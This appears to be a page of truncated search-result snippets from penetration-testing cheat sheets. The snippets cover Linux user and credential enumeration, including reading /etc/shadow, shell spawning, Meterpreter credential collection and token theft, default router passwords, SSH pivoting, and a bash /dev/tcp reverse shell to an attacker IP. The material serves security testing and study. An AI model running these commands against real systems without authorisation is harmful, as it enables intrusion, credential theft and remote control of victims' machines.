Users & Groups:
Command Result
cat /etc/passwd List all users on the system
cat /etc/group List all groups on the system
for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null List all uid’s and respective group memberships
cat /etc/shadow Show user hashes – Privileged comma...
Score: 1
Table of Contents
Information
Blind Files
System
Networking
User accounts
Credentials
Configs
Determine Distro
Installed Packages
Package Sources
Finding Important Files
Covering Your Tracks
Avoiding history filesmys
Obtain users’ information
Escalating
Looking for possible opened paths
Maintaining control
Reverse Shell
Fun if ...
Score: 1
Spawning shell/break restricted shell
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
echo os.system('/bin/bash')
(From within vi)
:!bash
Add all binary paths if PATH variable is lacking
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Set up webserver
python -m ...
Score: 1
DNS Enumeration:
Command Result
dig <domain_name> Perform a basic forward lookup
nslookup <domain_name> As above
host <domain_name> As Above
dig @<server> <domain_name> Use a specific name server to perform query
nslookup <domain_name> <server> As above
dig @<server> version.bind chaos tx...
Score: 1
John the Ripper is a favourite password cracking tool of many pentesters. There is plenty of documentation about its command line options.
I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general.
Sometimes I stumb...
Score: 1
<h2>Information Gathering</h2>
getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets
<h2>Escalating Privs</h2>
ps then migrate
getsystem
Tokens (use incognito)
list_tokens -u
impersonate_token
steal_token ...
Score: 1
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port...
Score: 1
Router Pentesting
=================
Database
Web Applications
Desktops
Servers
Web Sites
Routers
Three Different Types of scenario
=================================
1. People purchase routers and do not change the interface's credentials
Default Username
Default Passwords
admin:password
...
Score: 1
<h1>Reverse Shell Cheat Sheet</h1>
<i>Forked from: Published February 5, 2012 | By phillips321</i>
Step one – Set up your listener.
nc -l -v attackerip 4444
In all these examples the attacker IP will be 192.168.0.100
Bash
exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $lin...
Score: 0
SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features.
NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.
SOCKS Proxy
Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot thr...
Score: 0